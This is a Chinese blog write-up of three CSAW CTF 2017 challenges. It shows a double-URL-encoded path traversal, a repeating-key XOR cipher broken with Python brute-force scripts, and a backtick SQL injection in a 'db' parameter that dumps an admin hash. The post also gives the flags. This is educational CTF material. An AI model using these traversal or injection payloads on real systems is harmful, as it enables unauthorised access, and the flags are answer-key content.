MENU

CSAW CTF 2017

没做多少吧 每做一道都学到了不少
后续还有两道题 整理完了再放上来

orange v1

可以看出是一个文件包含 但是尝试之后发现无法包含 看了WP后才知道
. 可以用 Unicode编码绕过 %25 ../ 即为 %252e%252e/

mark

mark

然后向上列无数目录 就能看到flag.txt了
mark

mark

flag:flag{thank_you_based_orange_for_this_ctf_challenge}

Another Xor

题目如下

import hashlib
import sys

def xor(s1,s2):
    return ''.join(chr(ord(a) ^ ord(b)) for a,b in zip(s1,s2))

def repeat(s, l):
    return (s*(int(l/len(s))+1))[:l]

key = sys.argv[1]
plaintext = sys.argv[2] + key
plaintext += hashlib.md5(plaintext).hexdigest()
cipher = xor(plaintext, repeat(key, len(plaintext)))
print cipher.encode('hex')

数据

0x274c10121a0100495b502d551c557f0b0833585d1b27030b5228040d3753490a1c025415051525455118001911534a0052560a14594f0b1e490a010c4514411e070014615a181b02521b580305170002074b0a1a4c414d1f1d171d00151b1d0f480e491e0249010c150050115c505850434203421354424c1150430b5e094d144957080d4444254643

一开始确实没思路 因为没办法确定 keyplaintext 的长度
之后看了WP也有点迷 问了一下学长 自己推演了好久才想清楚
通过观察代码我们可以得到密文的构成和整体逻辑

[              ciphertext              ]
[key text][key text][key text][key text]
-------------------------------------------XOR
[message text][key text][hex characters]

这里的突破点就是MD5值
首先我们之后明文前五位是 flag{ 用明文和密文异或得到 key 的前五位 A qua
我们知道密文长度是137 所以就可以推断出明文+key的长度是105 就是减去32位MD5
接下来就是暴力测试key的长度了
我的思路是 从5开始跑到105 用来填充key
用key对密文异或得到明文 key中是
的地方全部跳过 用?来填充明文
然后关键点就是上面说的MD5值了 明文最后32位是MD5
MD5有一个特定点 就是一定由 0123456789abcdef 组成
那么我们判断跑出来的明文的最后32位除去?部分是否符合MD5的特点
下面贴脚本

c = "0x274c10121a0100495b502d551c557f0b0833585d1b27030b5228040d3753490a1c025415051525455118001911534a0052560a14594f0b1e490a010c4514411e070014615a181b02521b580305170002074b0a1a4c414d1f1d171d00151b1d0f480e491e0249010c150050115c505850434203421354424c1150430b5e094d144957080d4444254643"
c = hex2str(c)
#print len(c) 137
def getKeyLen():
    m = "flag{"
    #f5 = xor(m, c[:5])
    f5 = "A qua"
    #print tmp "A qua"
    for i in range(95):
        m = ""
        key = f5 + '*' * i
        rep = repeat(key, 137)
        for j in range(137):
            if rep[j] in f5:
                tmp = chr(ord(rep[j]) ^ ord(c[j]))
                m += tmp
            else:
                m += '?'
        for k in m[-32:].replace('?', ''):
            if k not in "0123456789abcdef":
                break
            else:
                print i + 5, m
getKeyLen()

最后正确的只有一个 就是 key 长度为67时
知道 key 长度之后就能推出所有的明文了
直接贴脚本

def getPlaintext():
    m = "flag{?????????????????????????????????A qua???????????????????????? zinc??????????????????????????????????????????????????????????????df2"
    key = "A qua??????????????????????????????????????????????????????????????A qua??????????????????????????????????????????????????????????????A q" 
    while '?' in m:
        m = list(m)
        key = list(key)
        for i in range(len(c)):
            if m[i] != '?' and key[i] == '?':
                key[i] = chr(ord(m[i]) ^ ord(c[i]))
            if m[i] == '?' and key[i] != '?':
                m[i] = chr(ord(key[i]) ^ ord(c[i]))
        m = ''.join(m)
        key = ''.join(key)

        print m
        key = m[38:105] * 2 + 'A q'
getPlaintext()

flag:flag{sti11_us3_da_x0r_for_my_s3cratz}

LittleQuery

有一个login页面 登陆时密码会被sha1()
index.php 找到一个被注释的路径 /api/db_explore.php

robots.txt
User-agent: *
Disallow: /api

访问 /api/db_explore.php 提示 Must specify mode={schema|preview}
尝试 ?mode=schema 得到 {"dbs":["littlequery"]}
尝试 ?mode=preview 得到 Must provide db and table to preview data
尝试 ?mode=preview&db=littlequery 得到 Must provide db and table to preview data
尝试 ?mode=schema&db=littlequery 得到 {"tables":["user"]}
发现貌似可以爆数据库结构 结果如下

"db":"littlequery",
"table":"user",
"columns": {
    "uid": "int(11)", 
    "username": "varchar(128)", 
    "password": "varchar(40)"
}

继续尝试 ?mode=preview&db=littlequery&table=user 得到 Database 'littlequery' is not allowed to be previewed.
修改 littlequery 看看 ?mode=preview&db=littlequery2333&table=user

`littlequery2333`.`` doesn't exist.

稍加测试之后尝试了

?mode=preview&db=littlequery`.`user`%20--%20--&table=  就出数据了
[
    {
        "uid": "1", 
        "username": "admin", 
        "password": "5896e92d38ee883cc09ad6f88df4934f6b074cf8"
    }
]

登陆进去就能得到flag了

flag:flag{mayb3_1ts_t1m3_4_real_real_escape_string?}

Tags: None
Archives QR Code
QR Code for this page
Tipping QR Code